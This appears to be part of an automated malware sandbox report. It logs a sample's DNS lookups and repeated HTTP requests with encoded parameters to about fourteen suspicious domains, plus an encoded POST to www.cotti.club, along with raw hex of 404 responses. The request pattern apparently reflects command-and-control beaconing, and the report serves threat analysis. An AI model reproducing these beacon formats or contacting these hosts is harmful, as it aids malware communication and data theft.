                Source: global trafficHTTP traffic detected: GET /3ej6/?78=Gf4n60vPMxeL0A+d5GBWdueSYaV7AAF6sYlT7O2otcMNGwtil4ITBlU9iT/EVO+vtwlhWFB1C/mfTw8URcWhMQgTObTwj1m/ib0JAzzbicsZX3cTLGstzzo=&hrOd=1DzdIBZXhZaHw2Wp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.cotti.clubConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /diem/?hrOd=1DzdIBZXhZaHw2Wp&78=6kQoSQEqBTKFeIgPWItcwMtJ6+nSmUORx6o6L7StlLAM0wJa+kMHFj5rDbCqKJO5phAeVuacSteB2VMr/yCaTx+wFCn7HbSrd9uZdvfw4QtNwXqKd1ZsMRg= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.solarand.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /2sun/?78=HFv57CWzV4D1L9ubGrUw/N+LZZ6BniYLjcS4cRbGENzhA3BKZjtgqnC6wzdpxcsL4M445YXmdmOqKzt/9+uXSXCfKbs+tX0lmfcjUf3N9oWc/wvfMeYS2jQ=&hrOd=1DzdIBZXhZaHw2Wp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.030002059.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /akxn/?hrOd=1DzdIBZXhZaHw2Wp&78=bVCpbCQOZK8RJSSOpbtjW6178FykoGhXFODVqYypnT+nS+pakzyDZ3G2gJzbbKB5bmDBooJSbxoFgw5n88RQ4gN+spy4B3V2SPR8yfMM1NLM4EIxe0ofqks= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.xipowerplay.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /wd23/?78=hRp9+v2en7tRz1flyqG17kFmttLc1zOskyKd0ztIjTxyYqd810hmijNQE9yj6BxK05vUksKTuuJXofOYLi9PR6uwuESMYbomdUS7hY3ZEsqPIlhTOHkKZSQ=&hrOd=1DzdIBZXhZaHw2Wp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.stationseek.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /jwed/?hrOd=1DzdIBZXhZaHw2Wp&78=BP+RnxL4kRmCbJis2H94uci3abF0xOX/uWRdW7IS0nQn3eBqrLGhokpRAgB0njlljCrnZN3jlOJi4UAaeIXlep/T+OgRPR3ifAipJWCHkORcjZ0KtUFfU2c= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.091210.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /wr26/?78=8UnATjvfTpQ77jvixFCgWVUX2yh4jGZbjC17bXoElnpRCxInjgnE/2IqsqXHODoNl6OiDfBQBXM7D7XvNANc8/XGVjRwEyGKTULZaqlRQkXooaUfX5GSz0A=&hrOd=1DzdIBZXhZaHw2Wp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.adsa6c.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /ep69/?78=1FIMhSJhU8+lHAAmrS+FlWYlLXz7aIiZYVZCfaZw4D7e7Ym+VFULEmTMy/HAB+T+rsRxHszMTzww+hC5XQWyLoZ+L/5l/vKoQeg/i8EmIWt3MnVCcXzM6O0=&hrOd=1DzdIBZXhZaHw2Wp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.simplek.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /xyex/?78=GRv8gXQeeb2Gl8ts68dy26JEIDOFTPQDU1Y3CPEivIL54q3aRuVfXNser16Tn8T/OBl4IICKxXKXWQiZ2Uzn7HwRtVNzQ2FbKXtno3vR39Y/zqEhWKkV0ww=&hrOd=1DzdIBZXhZaHw2Wp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.297676.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /dma3/?hrOd=1DzdIBZXhZaHw2Wp&78=IhPPRAmDChEnx8G5Mk3wYKJVvliqClSy7lT3/i9hniKwN2WP3nmtzIAyaYX2MoR3jQRU/NaT7iTCvd3O/fPSuEFMVnQWNGAOAVxjgpJaGw2AUh+P10Czoew= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.cesach.netConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /3xn5/?78=hLX784qEA4n55Q1oGw1olOPE1jv2cb5vRwpnfGUpuE0YTY8y9L6/CN63cm0behm+qDJgSuJj8e8DxEJz6zH1lBsEYFc4WGfLLcwXK2bqtXGi64JZ82gh2/U=&hrOd=1DzdIBZXhZaHw2Wp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.basicreviews.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /33ib/?hrOd=1DzdIBZXhZaHw2Wp&78=AYOfApeu9cghctp2i/KTSy5LkW4tz9x7+arej5d+r0NkQieZykYOddwLhoh5ni50J8Z5WiAS8Adn1ZwJ2laV/jmSd394ohUQohZCg1IJ+kicD56x/bghldI= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.sgland06.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /jr4j/?78=/uHXlXwxCWKagG2f+cMqJk/ouEnshdx+b5P4XSvx6MlJZzR/8pbZgxPfuPQh+b7XVC9rmLmVxzweaBtr7+wSxihG8Hktp9qijzhrRRKR+f0leSIT4/3X8Bo=&hrOd=1DzdIBZXhZaHw2Wp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.extrime1.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                Source: systeminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: <a href="https://www.facebook.com/piensasolutions" class="lower" target="_blank" title="S equals www.facebook.com (Facebook)
                Source: global trafficDNS traffic detected: DNS query: www.iampinky.info
                Source: global trafficDNS traffic detected: DNS query: www.cotti.club
                Source: global trafficDNS traffic detected: DNS query: www.solarand.online
                Source: global trafficDNS traffic detected: DNS query: www.030002059.xyz
                Source: global trafficDNS traffic detected: DNS query: www.xipowerplay.xyz
                Source: global trafficDNS traffic detected: DNS query: www.stationseek.online
                Source: global trafficDNS traffic detected: DNS query: www.091210.xyz
                Source: global trafficDNS traffic detected: DNS query: www.adsa6c.top
                Source: global trafficDNS traffic detected: DNS query: www.simplek.top
                Source: global trafficDNS traffic detected: DNS query: www.297676.com
                Source: global trafficDNS traffic detected: DNS query: www.cesach.net
                Source: global trafficDNS traffic detected: DNS query: www.basicreviews.online
                Source: global trafficDNS traffic detected: DNS query: www.sgland06.online
                Source: global trafficDNS traffic detected: DNS query: www.extrime1.shop
                Source: unknownHTTP traffic detected: POST /3ej6/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.5Host: www.cotti.clubCache-Control: max-age=0Content-Type: application/x-www-form-urlencodedContent-Length: 199Connection: closeOrigin: http://www.cotti.clubReferer: http://www.cotti.club/3ej6/User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like GeckoData Raw: 37 38 3d 4c 64 51 48 35 43 50 32 46 6c 65 53 30 51 58 34 77 58 4e 37 55 65 4b 5a 52 4a 6b 49 41 69 56 75 78 71 64 71 6c 66 57 42 76 66 49 78 41 41 39 41 79 70 45 53 4d 68 77 58 72 57 44 36 64 35 6d 67 6f 79 70 4f 62 33 6b 62 47 5a 75 54 55 47 35 4d 4d 37 43 74 42 68 42 47 49 49 2b 6b 68 30 57 4b 2b 62 78 63 41 30 4c 44 72 2f 68 70 43 42 49 59 41 56 41 73 74 41 68 38 47 66 67 4e 63 78 45 56 7a 44 74 64 39 61 45 72 39 39 61 38 31 68 44 53 74 79 74 5a 31 67 38 7a 35 44 55 5a 6e 77 34 41 6f 32 51 76 50 39 72 4c 4a 58 71 6b 32 64 6f 7a 51 4c 67 67 41 57 49 53 36 34 36 73 78 6c 4c 2f 53 77 3d 3d Data Ascii: 78=LdQH5CP2FleS0QX4wXN7UeKZRJkIAiVuxqdqlfWBvfIxAA9AypESMhwXrWD6d5mgoypOb3kbGZuTUG5MM7CtBhBGII+kh0WK+bxcA0LDr/hpCBIYAVAstAh8GfgNcxEVzDtd9aEr99a81hDStytZ1g8z5DUZnw4Ao2QvP9rLJXqk2dozQLggAWIS646sxlL/Sw==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 31 Oct 2024 00:38:35 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 31 Oct 2024 00:38:37 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 31 Oct 2024 00:38:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 31 Oct 2024 00:38:42 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cce1df-b96"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 0a 09 09 09 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 37 35 29 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 68 31 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 35 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 32 65 6d 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 